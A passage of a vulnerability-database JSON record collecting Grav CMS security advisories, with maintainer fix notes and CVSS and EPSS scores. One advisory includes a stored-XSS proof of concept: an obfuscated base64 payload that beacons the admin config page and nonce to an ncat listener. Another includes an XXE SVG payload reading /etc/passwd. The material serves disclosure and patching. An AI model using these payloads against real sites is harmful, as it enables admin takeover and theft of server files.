fail\n foreach ($patterns as $name => $regex) {\n if (!empty($enabled_rules[$name])) {\n if (preg_match($regex, $string) || preg_match($regex, $stripped) || preg_match($regex, $orig)) {\n return $name;\n }\n }\n }\n\n return null;\n }\n```\n\nSpecifically the line:\n\n```php\n'on_events' => '#(<[^>]+[a-z\\x00-\\x20\\\"\\'\\/])(on[a-z]+|xmlns)\\s*=[\\s|\\'\\\"].*[\\s|\\'\\\"]>#iUu',\n```\n\nassumes that the on_events will always begin with either `whitespace, ', \"` which can easily be bypassed with a simple payload like:\n\n`<img src=x onload=alert('1')>`\n\nThis XSS Filter practice is broken.\n1. Blacklisting every possible scenario that leads to XSS isn't possible.\n2. Regex can't parse HTML.\n\nIt would be better to use an HTMLPurifier.\n### PoC\nGrav Core + Admin Plugin\nGrav Version: `v1.7.49.5 - Admin v1.10.49.1`\n\n1. Create a low-privileged user with only enough permission to login and perform CRUD on Pages.\n\n\n2. Login as the low-privileged user and browse to pages:\n\n\n3. Create a post with the following content:\n```\n<svg><foreignObject><img src=x onerror=eval(atob('KGFzeW5jKCk9PntsZXQgcj1hd2FpdCBmZXRjaCgnL2dyYXYtYWRtaW4vYWRtaW4vY29uZmlnL2luZm8nKTtsZXQgdD1hd2FpdCByLnRleHQoKTtuYXZpZ2F0b3Iuc2VuZEJlYWNvbignaHR0cDovLzEyNy4wLjAuMTo4MDAxL2dyYXYtbG9nJyx0KX0pKCk7'))></foreignObject></svg>\n```\n\nThe payload base64 is decoded to: \n\n```javascript\n(async()=>{let r=await fetch('/grav-admin/admin/config/info');let t=await r.text();navigator.sendBeacon('http://127.0.0.1:8001/grav-log',t)})();\n```\n\nwhenever a user with enough privilege visits the attacker-controlled page, a request will be made to the `info` endpoint and the response will be sent to attacker beacon/listener.\n\n4. Save\n\n\n5. Start a `ncat` listener on port `8001`.\n\n```bash\n┌──(kali㉿kali)-[~]\n└─$ ncat -lvnp 8001\nNcat: Version 7.95 ( https://nmap.org/ncat )\nNcat: Listening on [::]:8001\nNcat: Listening on [0.0.0.0:8001](http://0.0.0.0:8001/)\nNcat: Connection from [127.0.0.1:44658](http://127.0.0.1:44658/).\n```\n\n6. Now as a Super Admin visit the `/` of Grav `[http://localhost/grav-admin/`](http://localhost/grav-admin/) for me:\n\n\n7. We get a response with the `admin-nonce` and the entire system information:\n\n```\n┌──(kali㉿kali)-[~]\n└─$ ncat -lvnp 8001\nNcat: Version 7.95 ( https://nmap.org/ncat )\nNcat: Listening on [::]:8001\nNcat: Listening on [0.0.0.0:8001](http://0.0.0.0:8001/)\nNcat: Connection from [127.0.0.1:44658](http://127.0.0.1:44658/).\nPOST /grav-log HTTP/1.1\nHost: [127.0.0.1:8001](http://127.0.0.1:8001/)\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br, zstd\nContent-Type: text/plain;charset=UTF-8\nContent-Length: 127013\nOrigin: http://localhost/\nConnection: keep-alive\nReferer: http://localhost/\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: no-cors\nSec-Fetch-Site: cross-site\nPriority: u=6\n\n <!DOCTYPE html>\n <html lang=\"en\">\n <head>\n <meta charset=\"utf-8\" />\n <title>Configuration: Info | Grav</title>\n <meta name=\"description\" content=\"\">\n <meta name=\"robots\" content=\"noindex, nofollow\">\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\n <link rel=\"icon\" type=\"image/png\" href=\"/grav-admin/user/plugins/admin/themes/grav/images/favicon.png\">\n\n \n\n \n <script type=\"text/javascript\">\n window.GravAdmin = window.GravAdmin || {};\n window.GravAdmin.config = {\n current_url: '/grav-admin/admin/config/info',\n base_url_relative: '/grav-admin/admin',\n base_url_simple: '/grav-admin',\n route: 'info',\n param_sep: ':',\n enable_auto_updates_check: '1',\n admin_timeout: '1800',\n admin_nonce: '1265db72d897b4324cbe7d1781e66e3b',\n \n \n<SNIPPED>\n```\n\n### Impact\n\nThis is a **Stored Cross-Site Scripting (XSS)** vulnerability exploitable by a low-privileged user, which leads to **exfiltration of the admin session context**, including the **`admin_nonce`**. This nonce can be abused to **bypass CSRF protections** and **authenticate further requests** to sensitive admin endpoints. Given Grav’s support for **scheduled tasks** and extensible plugin architecture, this can be escalated to **Remote Code Execution (RCE)** under favorable conditions.\n\n**Affected Component**: Grav Core + Admin Plugin (`v1.7.49.5` / `v1.10.49.1`) \n**Impact**: Full system compromise via RCE chain originating from low-privilege XSS.\n\n`CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H`\n`Overall CVSS Score: 9.0`\n`High Impact`\n\n---\n\n\n---\n\n## Maintainer note — fix applied (2026-04-24)\n\nFixed in Grav core on the `2.0` branch: commit [`5a12f9be8`](https://github.com/getgrav/grav/commit/5a12f9be8) — will ship in **2.0.0-beta.2**. Two changes in tandem:\n\n1. **Regex bypass** (detection layer) — the `on_events` regex that missed unquoted handlers is tightened; see the companion GHSA-9695-8fr9-hw5q advisory for details.\n\n2. **Missing dangerous tags** — `svg`, `math`, `option`, and `select` have been added to default `security.xss_dangerous_tags` in [`system/config/security.yaml`](https://github.com/getgrav/grav/blob/2.0/system/config/security.yaml). `svg` and `math` allow inline scripting through their XML namespace and event-handler surface; `option`/`select` are the tags attackers use to break out of the admin's select-template context before dropping the payload.\n\nCombined with the tightened `on_events` regex, the PoC `<svg>…<script>…</script></svg>` (and the GHSA-c2q3 `</option></select><img src=x onerror=alert(1)>` variant) now trip at least one detector.\n\n**Files:**\n- [`system/config/security.yaml`](https://github.com/getgrav/grav/blob/2.0/system/config/security.yaml) — dangerous-tags list extended.\n- [`system/src/Grav/Common/Security.php`](https://github.com/getgrav/grav/blob/2.0/system/src/Grav/Common/Security.php) — regex tightening.\n- [`tests/unit/Grav/Common/Security/DetectXssTest.php`](https://github.com/getgrav/grav/blob/2.0/tests/unit/Grav/Common/Security/DetectXssTest.php).", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42611", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00043", "scoring_system": "epss", "scoring_elements": "0.13684", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42611" }, { "reference_url": "https://github.com/getgrav/grav", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav" }, { "reference_url": "https://github.com/getgrav/grav/commit/5a12f9be8314682c8713e569e330f11805d0a663", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T18:23:37Z/" } ], "url": "https://github.com/getgrav/grav/commit/5a12f9be8314682c8713e569e330f11805d0a663" }, { "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-w8cg-7jcj-4vv2", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T18:23:37Z/" } ], "url": "https://github.com/getgrav/grav/security/advisories/GHSA-w8cg-7jcj-4vv2" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42611", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42611" }, { "reference_url": "https://github.com/advisories/GHSA-w8cg-7jcj-4vv2", "reference_id": "GHSA-w8cg-7jcj-4vv2", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-w8cg-7jcj-4vv2" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110986?format=api", "purl": "pkg:composer/getgrav/grav@2.0.0-beta.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-aa7e-n85b-wbdm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@2.0.0-beta.2" } ], "aliases": [ "CVE-2026-42611", "GHSA-w8cg-7jcj-4vv2" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-6quf-qqqk-43a1" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/94869?format=api", "vulnerability_id": "VCID-6tq3-4hkt-y3au", "summary": "Grav is Vulnerable to XXE via SVG Upload\nDear Grav Security Team,\n\nA security vulnerability was discovered in Grav CMS that allows authenticated attackers to read arbitrary files from the server through XML External Entity (XXE) injection.\n\n Vulnerability Summary\n\n| Field | Details |\n|-------|---------|\n| Vulnerability Type | XML External Entity (XXE) Injection |\n| Severity | High (CVSS 7.5) |\n| Affected Versions | Grav CMS <= 1.7.x |\n| Affected Component | SVG file upload/processing |\n| CWE | CWE-611: Improper Restriction of XML External Entity Reference |\n| Authentication Required | Yes (Admin panel access) |\n\nTechnical Details\n\n Root Cause\nThe application uses `simplexml_load_string()` to process uploaded SVG files without disabling external entity loading. This allows attackers to inject XXE payloads that are processed by the XML parser.\n\n Vulnerable Code Pattern\n```php\n// Current (Vulnerable):\n$svg = simplexml_load_string($content);\n\n// No LIBXML_NOENT flag or entity loader protection\n```\n\n Attack Vector\n1. Attacker authenticates to Grav admin panel\n2. Uploads malicious SVG file via Pages → Media or File Manager plugin\n3. Server parses SVG and processes XXE entities\n4. Arbitrary file contents are exfiltrated\n\n Impact\n\nAn authenticated attacker can:\n\n1. Read sensitive files:\n - `/etc/passwd` - System user information\n - `user/accounts/*.yaml` - Admin credentials and 2FA secrets\n - `user/config/system.yaml` - System configuration\n - `.env` files - Environment secrets and API keys\n\n2. Perform SSRF - Access internal services via external entity URLs\n\n3. Potential DoS - Billion laughs attack via recursive entity expansion\n\nProof of Concept\n\n Malicious SVG Payload\n```xml\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE svg [\n <!ENTITY xxe SYSTEM \"file:///etc/passwd\">\n]>\n<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"100\" height=\"100\">\n <text x=\"10\" y=\"50\">&xxe;</text>\n</svg>\n```\n\n Steps to Reproduce\n1. Login to Grav CMS admin panel\n2. Navigate to Pages → select any page → Media tab\n3. Upload the malicious SVG file\n4. Observe file contents in response/error or stored output\n\n Recommended Fix\n\n Option 1: Add XXE Protection Flags\n```php\nlibxml_use_internal_errors(true);\n$svg = simplexml_load_string($content, 'SimpleXMLElement', LIBXML_NOENT | LIBXML_DTDLOAD);\n```\n\n Option 2: Use SVG Sanitizer Library (Recommended)\n```php\nuse enshrined\\svgSanitize\\Sanitizer;\n\n$sanitizer = new Sanitizer();\n$sanitizer->removeRemoteReferences(true);\n$cleanSVG = $sanitizer->sanitize($content);\n```\n\nThe `enshrined/svg-sanitize` library properly strips XXE payloads and other malicious SVG content.\n\n Request\n\n1. Please acknowledge receipt of this report within 5 business days\n2. Please provide an estimated timeline for a security patch\n3. I am happy to assist with testing the fix\n4. I request a CVE be assigned for this vulnerability\n5. If you have a security advisory process, please include me in the credits\n\nTurki Almatrafi.\n\n\n\n---\n\n## Maintainer note — fix applied (2026-04-24)\n\nFixed across two repos:\n\n1. **Grav core on the `2.0` branch** (commit [`5a12f9be8`](https://github.com/getgrav/grav/commit/5a12f9be8), ships in **2.0.0-beta.2**) — `VectorImageMedium::__construct` (the code path that reads width/height from an uploaded SVG) now strips `<!DOCTYPE>` and `<!ENTITY>` declarations before parsing, and calls `simplexml_load_string` with `LIBXML_NONET | LIBXML_NOERROR | LIBXML_NOWARNING`. On PHP < 8 it also calls `libxml_disable_entity_loader(true)` for the duration of the parse.\n\n2. **rhukster/dom-sanitizer** (commit [`02d08ec`](https://github.com/rhukster/dom-sanitizer/commit/02d08ec)) — the library Grav ships as its SVG sanitizer. `loadDocument` now applies the same DOCTYPE/ENTITY strip and passes `LIBXML_NONET` to `loadXML`/`loadHTML`.\n\nWith both layers in place, the PoC:\n\n```xml\n<!DOCTYPE svg [\n <!ENTITY xxe SYSTEM \"file:///etc/passwd\">\n]>\n<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"100\" height=\"100\">\n <text x=\"10\" y=\"50\">&xxe;</text>\n</svg>\n```\n\nno longer expands `&xxe;`, and the parser cannot make outbound filesystem or network requests for external entities/DTDs. Billion-laughs-style entity expansion is also neutralized because the declarations are stripped before libxml ever sees them.\n\n**Files:**\n- [`system/src/Grav/Common/Page/Medium/VectorImageMedium.php`](https://github.com/getgrav/grav/blob/2.0/system/src/Grav/Common/Page/Medium/VectorImageMedium.php).\n- [`tests/unit/Grav/Common/Security/SvgXxeSecurityTest.php`](https://github.com/getgrav/grav/blob/2.0/tests/unit/Grav/Common/Security/SvgXxeSecurityTest.php) — XXE neutralization + billion-laughs + plain-SVG regression.\n- dom-sanitizer: [`src/DOMSanitizer.php`](https://github.com/rhukster/dom-sanitizer/blob/main/src/DOMSanitizer.php) + two new XXE tests in its own suite.", "references": [ { "reference_url": "https://github.com/getgrav/grav", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav" }, { "reference_url": "https://github.com/getgrav/grav/commit/5a12f9be8314682c8713e569e330f11805d0a663", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav/commit/5a12f9be8314682c8713e569e330f11805d0a663" }, { "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-3446-6mgw-f79p", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav/security/advisories/GHSA-3446-6mgw-f79p" }, { "reference_url": "https://github.com/advisories/GHSA-3446-6mgw-f79p", "reference_id": "GHSA-3446-6mgw-f79p", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-3446-6mgw-f79p" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110986?format=api", "purl": "pkg:composer/getgrav/grav@2.0.0-beta.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-aa7e-n85b-wbdm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@2.0.0-beta.2" } ], "aliases": [ "GHSA-3446-6mgw-f79p" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-6tq3-4hkt-y3au" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/47313?format=api", "vulnerability_id": "VCID-7jaz-7xjc-kka1", "summary": "Server Side Template Injection (SSTI)\nDue to the unrestricted access to twig extension class from grav context, an attacker can redefine config variable. As a result, attacker can bypass previous patch.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-28118", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00394", "scoring_system": "epss", "scoring_elements": "0.60649", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-28118" }, { "reference_url": "https://github.com/getgrav/grav", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav" }, { "reference_url": "https://github.com/getgrav/grav/commit/de1ccfa12dbcbf526104d68c1a6bc202a98698fe", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-07-08T15:04:35Z/" } ], "url": "https://github.com/getgrav/grav/commit/de1ccfa12dbcbf526104d68c1a6bc202a98698fe" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28118", "reference_id": "CVE-2024-28118", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28118" }, { "reference_url": "https://github.com/advisories/GHSA-r6vw-8v8r-pmp4", "reference_id": "GHSA-r6vw-8v8r-pmp4", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-r6vw-8v8r-pmp4" }, { "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-r6vw-8v8r-pmp4", "reference_id": "GHSA-r6vw-8v8r-pmp4", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-07-08T15:04:35Z/" } ], "url": "https://github.com/getgrav/grav/security/advisories/GHSA-r6vw-8v8r-pmp4" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/69508?format=api", "purl": "pkg:composer/getgrav/grav@1.7.45", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-5kr2-3ywy-9kcn" }, { "vulnerability": "VCID-6a4v-d3zb-67cq" }, { "vulnerability": "VCID-6quf-qqqk-43a1" }, { "vulnerability": "VCID-6tq3-4hkt-y3au" }, { "vulnerability": "VCID-9j1y-z47y-xudz" }, { "vulnerability": "VCID-9tu1-4n1t-6bgv" }, { "vulnerability": "VCID-a375-aqzf-r7gw" }, { "vulnerability": "VCID-a8df-4jgt-gba4" }, { "vulnerability": "VCID-aa7e-n85b-wbdm" }, { "vulnerability": "VCID-abwg-zvc9-w7dq" }, { "vulnerability": "VCID-agks-r1vd-u3d6" }, { "vulnerability": "VCID-athb-nf3a-yyga" }, { "vulnerability": "VCID-bafn-ne38-nucy" }, { "vulnerability": "VCID-bhhz-z132-zkhb" }, { "vulnerability": "VCID-c9jy-y2dh-x3dg" }, { "vulnerability": "VCID-e61c-rd9y-wyhs" }, { "vulnerability": "VCID-egxp-rctq-xyh8" }, { "vulnerability": "VCID-esjd-ztwe-c3h1" }, { "vulnerability": "VCID-f3wx-5ayr-tqga" }, { "vulnerability": "VCID-fmmu-r77k-c7g2" }, { "vulnerability": "VCID-k8fd-bqpk-2qg8" }, { "vulnerability": "VCID-kbnn-6uws-kqh9" }, { "vulnerability": "VCID-p1u7-9mk4-fkcr" }, { "vulnerability": "VCID-p5d4-8rvg-uqem" }, { "vulnerability": "VCID-r2dh-em54-nyfz" }, { "vulnerability": "VCID-rcyu-yu31-n7gu" }, { "vulnerability": "VCID-rj4b-8dyu-juen" }, { "vulnerability": "VCID-seer-x4fd-e7ge" }, { "vulnerability": "VCID-ss11-shq5-qqae" }, { "vulnerability": "VCID-tkxm-vt8p-tqgv" }, { "vulnerability": "VCID-u7yn-d7uj-57bh" }, { "vulnerability": "VCID-v8u1-nbxw-a7fr" }, { "vulnerability": "VCID-v9n7-vann-6fa5" }, { "vulnerability": "VCID-vm87-35gf-eyft" }, { "vulnerability": "VCID-xj7v-ry9d-dfh1" }, { "vulnerability": "VCID-y7vc-cx37-7ubs" }, { "vulnerability": "VCID-ymnw-h6as-fbe5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.45" } ], "aliases": [ "CVE-2024-28118", "GHSA-r6vw-8v8r-pmp4" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-7jaz-7xjc-kka1" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/54876?format=api", "vulnerability_id": "VCID-9j1y-z47y-xudz", "summary": "Grav Vulnerable to Arbitrary File Read to Account Takeover\nA low privilege user account with page edit privilege can read any server files using Twig Syntax. This includes Grav user account files - /grav/user/accounts/*.yaml. This file stores hashed user password, 2FA secret, and the password reset token. This can allow an adversary to compromise any registered account by resetting a password for a user to get access to the password reset token from the file or by cracking the hashed password.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-34082", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00276", "scoring_system": "epss", "scoring_elements": "0.51328", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-34082" }, { "reference_url": "https://github.com/getgrav/grav", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav" }, { "reference_url": "https://github.com/getgrav/grav/commit/b6bba9eb99bf8cb55b8fa8d23f18873ca594e348", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-15T19:34:23Z/" } ], "url": "https://github.com/getgrav/grav/commit/b6bba9eb99bf8cb55b8fa8d23f18873ca594e348" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34082", "reference_id": "CVE-2024-34082", "reference_type": "", "scores": [ { "value": "8.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34082" }, { "reference_url": "https://github.com/advisories/GHSA-f8v5-jmfh-pr69", "reference_id": "GHSA-f8v5-jmfh-pr69", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-f8v5-jmfh-pr69" }, { "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-f8v5-jmfh-pr69", "reference_id": "GHSA-f8v5-jmfh-pr69", "reference_type": "", "scores": [ { "value": "8.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-15T19:34:23Z/" } ], "url": "https://github.com/getgrav/grav/security/advisories/GHSA-f8v5-jmfh-pr69" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/81408?format=api", "purl": "pkg:composer/getgrav/grav@1.7.46", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-5kr2-3ywy-9kcn" }, { "vulnerability": "VCID-6a4v-d3zb-67cq" }, { "vulnerability": "VCID-6quf-qqqk-43a1" }, { "vulnerability": "VCID-6tq3-4hkt-y3au" }, { "vulnerability": "VCID-9tu1-4n1t-6bgv" }, { "vulnerability": "VCID-a375-aqzf-r7gw" }, { "vulnerability": "VCID-a8df-4jgt-gba4" }, { "vulnerability": "VCID-aa7e-n85b-wbdm" }, { "vulnerability": "VCID-abwg-zvc9-w7dq" }, { "vulnerability": "VCID-agks-r1vd-u3d6" }, { "vulnerability": "VCID-athb-nf3a-yyga" }, { "vulnerability": "VCID-bafn-ne38-nucy" }, { "vulnerability": "VCID-bhhz-z132-zkhb" }, { "vulnerability": "VCID-c9jy-y2dh-x3dg" }, { "vulnerability": "VCID-e61c-rd9y-wyhs" }, { "vulnerability": "VCID-esjd-ztwe-c3h1" }, { "vulnerability": "VCID-f3wx-5ayr-tqga" }, { "vulnerability": "VCID-fmmu-r77k-c7g2" }, { "vulnerability": "VCID-k8fd-bqpk-2qg8" }, { "vulnerability": "VCID-kbnn-6uws-kqh9" }, { "vulnerability": "VCID-p1u7-9mk4-fkcr" }, { "vulnerability": "VCID-p5d4-8rvg-uqem" }, { "vulnerability": "VCID-r2dh-em54-nyfz" }, { "vulnerability": "VCID-rcyu-yu31-n7gu" }, { "vulnerability": "VCID-rj4b-8dyu-juen" }, { "vulnerability": "VCID-seer-x4fd-e7ge" }, { "vulnerability": "VCID-ss11-shq5-qqae" }, { "vulnerability": "VCID-tkxm-vt8p-tqgv" }, { "vulnerability": "VCID-u7yn-d7uj-57bh" }, { "vulnerability": "VCID-v8u1-nbxw-a7fr" }, { "vulnerability": "VCID-v9n7-vann-6fa5" }, { "vulnerability": "VCID-vm87-35gf-eyft" }, { "vulnerability": "VCID-xj7v-ry9d-dfh1" }, { "vulnerability": "VCID-y7vc-cx37-7ubs" }, { "vulnerability": "VCID-ymnw-h6as-fbe5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.46" } ], "aliases": [ "CVE-2024-34082", "GHSA-f8v5-jmfh-pr69" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-9j1y-z47y-xudz" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49301?format=api", "vulnerability_id": "VCID-9tu1-4n1t-6bgv", "summary": "Grav is vulnerable to Server-Side Template Injection (SSTI) via Forms\nHaving a simple form on site can reveal the whole Grav configuration details (including plugin configuration details) by using the correct POST payload. Sensitive information may be contained in the configuration details.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66298", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0007", "scoring_system": "epss", "scoring_elements": "0.21559", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66298" }, { "reference_url": "https://github.com/getgrav/grav", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav" }, { "reference_url": "https://github.com/getgrav/grav/commit/e37259527d9c1deb6200f8967197a9fa587c6458", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T14:06:52Z/" } ], "url": "https://github.com/getgrav/grav/commit/e37259527d9c1deb6200f8967197a9fa587c6458" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66298", "reference_id": "CVE-2025-66298", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66298" }, { "reference_url": 